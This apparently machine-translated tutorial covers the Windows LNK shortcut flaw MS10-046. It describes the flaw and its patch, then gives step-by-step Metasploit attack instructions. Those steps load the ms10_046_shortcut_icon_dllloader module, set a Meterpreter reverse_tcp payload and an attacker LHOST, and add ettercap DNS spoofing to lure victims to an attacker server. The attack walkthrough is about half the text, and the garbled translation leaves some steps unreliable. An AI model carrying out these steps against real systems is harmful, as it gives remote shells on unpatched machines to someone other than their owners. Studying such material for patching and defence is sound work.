Microsoft Windows shortcuts LNK file Automatic Code Execution Vulnerability (MS10-046)

1. Vulnerability Definition

 

Windows supports shortcuts or LNK files. The LNK file is a reference to a local file. clicking the LNK file has the same effect as clicking the target specified by the shortcut.

Windows does not properly process the LNK file. The specially crafted LNK file may cause Windows to automatically execute the code specified by the shortcut file. The code may be in a USB drive, local or remote file system, optical drive, or other location. Using resource manager to view the location of the LNK file is enough to trigger this vulnerability. By default, Windows Enables automatic loading and playback. Therefore, Windows automatically opens the resource manager after connecting to a Removable device (such as USB flash memory. Other applications that display file icons can also be used as attack carriers for this vulnerability. The affected Windows systems are shown in table 1 below:

 

Vulnerability name	Affected Windows System Types
MS10-046	Microsoft Windows XP SP3
	Microsoft Windows XP SP2
	Microsoft Windows Vista SP2
	Microsoft Windows Vista SP1
	Microsoft Windows Server 2008
	Microsoft Windows Server 2008 SP2
	Microsoft Windows Server 2008 R2
	Microsoft Windows Server 2003 SP2
	Microsoft Windows 7

 

2. Patches

Microsoft has released a Security Bulletin (MS10-046) and patches for this:

MS10-046: Vulnerability in Windows Shell cocould Allow Remote Code Execution (2286198), links to its detailed documentation are as follows:

Http://www.microsoft.com/china/technet/security/bulletin/MS10-046.mspx

This security update addresses a publicly disclosed vulnerability in Windows Shell. If a special shortcut icon is displayed, the vulnerability may allow remote code execution. Attackers who successfully exploit this vulnerability can obtain the same user permissions as local users. You can use third-party tools such as 360 security guard to update patches in addition to automatic updates provided by Windows.

 

Attack operation:

 

Next, we start to use Metasploit3 for overflow attacks. The detailed steps are as follows.

Step 1: Go to Metasploit and load the attack code.

As an attacker, the first step is to access Metasploit. In addition to clicking Metasploit directly from the menu, you can also open any Shell in the graphic interface and directly enter the msfconsole command to enter Metasploit. As shown in-1, you can see the current number of codes, parameter status, and the latest version.

 

 

The command is as follows: search ms10_046

After you press enter, you can see the search result shown in-2. A usable attack code named "ms10_046_shortcut_icon_dllloader" is displayed. Next, you can load the attack code. The specific command is as follows:

 

Use windows/browser/ms10_046_shortcut_icon_dllloader before using an attack code, you must first check the required setting parameters. Therefore, enter the following command: after the show options press enter, the attack code setting parameters are displayed, as shown in-3. The SRVHOST, SRVPORT, and URIPATH parameters are mandatory, SRVPORT and URIPATH are set by default. Step 2: configure the attack code on metasploit3. Now that you know the required configuration parameters, you can use the set command to configure parameters in sequence. Specifically, the overflow PAYLOAD is set to reverse overflow. To use Meterpreter with enhanced Shell in Metasploit, set PAYLOAD to windows/metepreter/reverse_tcp, later, attackers will also use ettercap to perform DNS spoofing attacks on the target. Therefore, the attacker should set the destination of the port to its own IP address, that is, set the LHOST to its own IP address. Finally, execute overflow using exploit. The specific command is as follows: set SRVHOST the attacker's own IP address set PAYLOAD windows/meterpreter/reverse_tcp set LHOST the attacker's own IP Address exploit, and press enter in sequence, as shown in-4, an http: // 10.23.0.3: 80 URL is enabled, corresponding to a shared directory \ 10.23.0.3 \ owhBPhxMJ \. Metasploit can be triggered when http: // 10.23.0.3: 80 is accessed.